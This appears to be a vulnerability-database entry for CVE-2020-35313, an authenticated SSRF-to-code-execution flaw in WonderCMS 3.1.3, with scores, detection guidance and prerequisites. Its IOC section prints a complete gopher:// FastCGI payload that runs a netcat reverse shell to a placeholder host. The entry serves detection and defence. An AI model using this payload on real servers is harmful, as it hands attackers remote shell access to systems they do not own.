CVE-2020-35313
Published 2021-04-20
Priority: P270 · Critical 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: EPSS 45.22% (98.6th percentile)
A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to execute arbitrary code via a crafted URL to the theme/plugin installer.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wondercms | wondercms | — | — |
Detection & IOCs (extracted from sources)
Command: gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500
Detection guidance
- Monitor HTTP GET requests to index.php containing the query parameter 'installThemePlugin' with a gopher:// scheme URI, which is the attack delivery vector for this SSRF-to-RCE chain.
- Detect outbound or loopback gopher:// scheme requests targeting 127.0.0.1:9000, indicative of SSRF abuse against a local FastCGI (PHP-FPM) listener.
- Alert on the presence of the string 'Made-by-SpyD3r' in HTTP request bodies or URL-encoded payloads, which is a unique marker embedded in the FastCGI exploit payload.
- Detect FastCGI PHP_VALUE injection attempts setting 'allow_url_include = On' and 'auto_prepend_file = php://input', which enables arbitrary PHP code execution via the gopher SSRF payload.
- The exploit requires an authenticated session; monitor for POST login attempts to WonderCMS followed immediately by GET requests with the 'installThemePlugin' parameter as a behavioral chain indicator.
- The vulnerable function is addCustomThemePluginRepository in index.php; audit WAF/application logs for unsanitized URL values passed to the theme/plugin installer endpoint.
Exploitation prerequisites
- The gopher-based FastCGI payload hardcodes SCRIPT_FILENAME as /usr/share/php/PEAR.php; this path must exist on the target system for the RCE stage to succeed. Targets without PEAR installed at this path will not be exploitable via this specific payload.
- Exploitation requires FastCGI (PHP-FPM) to be listening on localhost port 9000. Environments using a Unix socket or a non-default port will not be vulnerable to this specific exploit chain.
- The exploit requires valid CMS credentials; unauthenticated attackers cannot trigger the SSRF directly. Credential compromise is a prerequisite.
CVSS provenance
- NVD, CVSS v3.1: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
No detection rules found.
No writeups or analysis indexed.
References
- https://github.com/robiso/wondercms
- https://packetstormsecurity.com/files/160310/WonderCMS-3.1.3-Code-Execution-Server-Side-Request-Forgery.html
- https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/